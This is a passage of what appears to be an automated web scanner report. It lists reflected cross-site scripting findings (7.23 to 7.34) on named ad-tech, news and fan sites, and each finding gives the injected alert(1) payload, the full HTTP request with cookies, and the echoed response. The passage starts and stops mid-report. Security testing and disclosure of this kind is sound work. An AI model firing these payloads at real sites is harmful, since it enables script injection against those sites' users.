HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 02:44:57 GMT; path=/; domain=digg.com
Set-Cookie: d=dbc3b6621d940455b22731ca1a1c09a089781e5816736e7f487763dbd8526321; expires=Sat, 01-May-2021 12:52:37 GMT; path=/; domain=.digg.com
X-Digg-Time: D=950979 10.2.129.156
Vary: Accept-Encoding
nnCoection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17000

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3.rss">
...[SNIP]...

7.23. http://guru.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcae3'%3balert(1)//08cf1cf24cb was submitted in the h parameter. This input was echoed as dcae3';alert(1)//08cf1cf24cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300&h=250dcae3'%3balert(1)//08cf1cf24cb&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:26:10 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250dcae3';alert(1)//08cf1cf24cb" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

7.24. http://guru.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797d2"%3balert(1)//dc8428cd2c7 was submitted in the pid parameter. This input was echoed as 797d2";alert(1)//dc8428cd2c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF797d2"%3balert(1)//dc8428cd2c7&w=300&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:30 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF797d2";alert(1)//dc8428cd2c7&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWC
...[SNIP]...

7.25. http://guru.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c758f'%3balert(1)//df004e2400e was submitted in the w parameter. This input was echoed as c758f';alert(1)//df004e2400e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300c758f'%3balert(1)//df004e2400e&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:50 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300c758f';alert(1)//df004e2400e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

7.26. http://hit.blvdstatus.com/t [tid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hit.blvdstatus.com
Path:   /t

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7241e'%3balert(1)//f5921333a0a was submitted in the tid parameter. This input was echoed as 7241e';alert(1)//f5921333a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /t?tid=BS-d8cfb33d-27241e'%3balert(1)//f5921333a0a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: hit.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:15 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 2974

var __seoq_h = 'http://hit.blvdstatus.com';var __seoq_o = true;var __seoq_t = 'BS-d8cfb33d-27241e';alert(1)//f5921333a0a';var __seoq_s = 'sd8c4dbe198f6eff30.86464733';
function __seoq_get_host(x)
{var m;if(m=x.match(/(http|ftp|https):\/\/(.*?)\/.*$/)){return m[2];}}
function BLVD(){var c=this._Get_Cookie('blvdS');if(c){
...[SNIP]...

7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff3e7'%3balert(1)//1e4b9f7a9ac was submitted in the _TSM_HiddenField_ parameter. This input was echoed as ff3e7';alert(1)//1e4b9f7a9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article.aspx?_TSM_HiddenField_=ctl00_tsm_HiddenFieldff3e7'%3balert(1)//1e4b9f7a9ac&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3a865923e8%3a91bd373d%3a596d588c%3a411fea1c%3ae7c87f07%3abbfda34c%3a30a78ec5%3a42b7c466 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Mon, 30 Apr 2012 23:34:39 GMT
Last-Modified: Wed, 27 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:34:39 GMT
Content-Length: 122119

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
false);
//END AjaxControlToolkit.PopupControl.PopupControlBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_tsm_HiddenFieldff3e7';alert(1)//1e4b9f7a9ac').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:865923e8:91bd373d:596d588c:411fea1c:e7c87f07:bbfd
...[SNIP]...

7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68af2'%3balert(1)//795c1f771d3 was submitted in the admeld_callback parameter. This input was echoed as 68af2';alert(1)//795c1f771d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match68af2'%3balert(1)//795c1f771d3 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:10:18 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 404

document.write('<img width="0" height="0" src="http://tag.admeld.com/match68af2';alert(1)//795c1f771d3?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304734238&custom_user_segments=%2C11265%2C49026%2C49027%2C50185%2C4625%2C6551%2C10656%2C24493%2C30767%2C14769
...[SNIP]...

7.29. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa20"><script>alert(1)</script>f930ba57874 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4aa20"><script>alert(1)</script>f930ba57874&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:39 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2447822087988458761&fpid=4aa20"><script>alert(1)</script>f930ba57874&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.30. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801c8"><script>alert(1)</script>131f7da3ea4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=801c8"><script>alert(1)</script>131f7da3ea4&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4010451028652069296&fpid=4&nu=n&t=&sp=801c8"><script>alert(1)</script>131f7da3ea4&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 695f8'%3balert(1)//5ff8671c168 was submitted in the site parameter. This input was echoed as 695f8';alert(1)//5ff8671c168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s28japanator695f8'%3balert(1)//5ff8671c168 HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:36 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator695f8';alert(1)//5ff8671c168', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator695f8';alert(1)//5ff8671c168';
// ]]>
...[SNIP]...

7.32. http://s28.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df6e'%3balert(1)//b8c17a2141b was submitted in the site parameter. This input was echoed as 3df6e';alert(1)//b8c17a2141b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s28japanator3df6e'%3balert(1)//b8c17a2141b HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:08 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator3df6e';alert(1)//b8c17a2141b', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator3df6e';alert(1)//b8c17a2141b';
// ]]>
...[SNIP]...

7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomopop.com
Path:   /index-ad-anime.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58591"><script>alert(1)</script>8ca5ec22d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40 HTTP/1.1
Host: tomopop.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:04:07 GMT
Server: lighttpd/1.4.28
Content-Length: 305146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="http://tomopop.com/index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40?start=10">
...[SNIP]...

7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
